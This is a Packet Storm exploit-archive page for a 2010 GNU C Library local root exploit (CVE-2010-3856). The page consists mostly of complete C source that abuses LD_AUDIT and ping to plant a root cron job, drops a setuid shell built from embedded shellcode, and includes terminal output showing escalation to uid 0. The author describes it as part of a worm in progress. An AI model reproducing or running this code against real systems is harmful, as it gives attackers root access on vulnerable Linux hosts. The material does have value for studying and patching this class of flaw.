exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GNU C Library Local Root Exploit

GNU C Library Local Root Exploit
Posted Dec 5, 2010
Authored by tempe_mendoan | Site devilzc0de.org

GNU C library (glibc) local root exploit (uid=0,gid=0) that leverages a ld.so arbitrary DSO loading via LD_AUDIT vulnerability.

tags | exploit, arbitrary, local, root
advisories | CVE-2010-3856
SHA-256 | a166f09637f10d8f9c395ecc8e4a485484727fbc73b491608d365b355986f067

GNU C Library Local Root Exploit

Change Mirror Download
/**
#Exploit Title: GNU C Library local root (uid=0,gid=0) exploit
#date: 04-12-10
#author: devilzc0de
#bugs found by: Tavis Ormandy (taviso@sdf.lonestar.org)
# Tested on: Debian GNU/Linux 5.0
#CVE: 2010-3856
#vulnerable : GNU C library
a basic exploit made by: devilzc0de (www.devilzc0de.org)
special thanks to all devilzc0de crews and members, glodhaxors crews and members
tis is part of my worm (currently making dual os worm for 7 months)
mywisdom@DL:~/sploit$ id
uid=1002(mywisdom) gid=1001(mywisdom) groups=1001(mywisdom)
mywisdom@DL:~/sploit$ ./glibc


GLIBC local privilege escalation exploit

Bugs found by Tavis Ormandy

made by: devilzc0de.org

ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+]waiting for dropped suid shell from our cron daemon, please wait ...
sh-3.2# id
uid=0(root) gid=0(root) groups=1001(mywisdom)
sh-3.2#
**/
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
void salam()
{
printf("\n\nGLIBC local privilege escalation exploit\n");
printf("\nBugs found by Tavis Ormandy\n");
printf("\nmade by: devilzc0de.org\n\n");
}

void eksplo1()
{
int i;
struct stat bufer;
umask(0);
bikin_payload1();
popen("dpkg -S /lib/libpcprofile.so","r");
if(stat("/lib/libpcprofile.so",&bufer)!=0)
{
eksplo2();
}
else
{
popen("LD_AUDIT='libpcprofile.so' PCPROFILE_OUTPUT='/etc/cron.d/w00t' ping","r");
}

if(stat("/etc/cron.d/w00t",&bufer)!=0)
{
eksplo2();
}
else
{
if(stat("/tmp/suidshell",&bufer)!=0)
{
exit(1);
}
else
{
popen("echo '* * * * * root cp /bin/dash /tmp/gotroot; chmod u+s /tmp/gotroot\n' > /etc/cron.d/w00t", "r");

}
printf("[+]waiting for dropped suid shell from our cron daemon, please wait ...\n");
usleep(60000000);

system("/tmp/./gotroot -c /tmp/./suidshell");
}
}
int bikin_payload1()
{

FILE *fp2;
const char *str2 ="char shellcode[] =\"\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\";int main(){int (*f)() = (int(*)())shellcode;f();}";
fp2 = fopen("suid.c", "w");
fwrite(str2, 1, strlen(str2), fp2);
fclose(fp2);
popen("gcc -o /tmp/suidshell suid.c","r");

}

int bikin_payload2()
{

FILE *fp;
const char *str ="void __attribute__((constructor)) init(){ setuid(0);system(\"/bin/bash\");}";
fp = fopen("payload.c", "w");
fwrite(str, 1, strlen(str), fp);
fclose(fp);
popen("gcc -w -fPIC -shared -o /tmp/exploit payload.c","r");


}

void il_fil_de()
{
struct stat buf;
if(stat("payload.c",&buf)==0)
{
remove("payload.c");
}
if(stat("suid.c",&buf)==0)
{
remove("suid.c");
}
if(stat("/tmp/exploit",&buf)==0)
{

remove("/tmp/exploit");
}

}
int eksplo2()
{

remove("/tmp/exploit");
popen("mkdir /tmp/exploit;ln /bin/ping /tmp/exploit/target","r");
popen("exec 3< /tmp/exploit/target","r");
remove("/tmp/exploit");

bikin_payload2();

popen("LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3","r");

}


int main(int argc,char **argv[])
{

struct stat buf;
salam();
il_fil_de();
mkdir("/tmp/exploit",0777);

if(stat("/etc/cron.d",&buf)!=0)
{
eksplo2();
}
else
{
eksplo1();
}
}
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close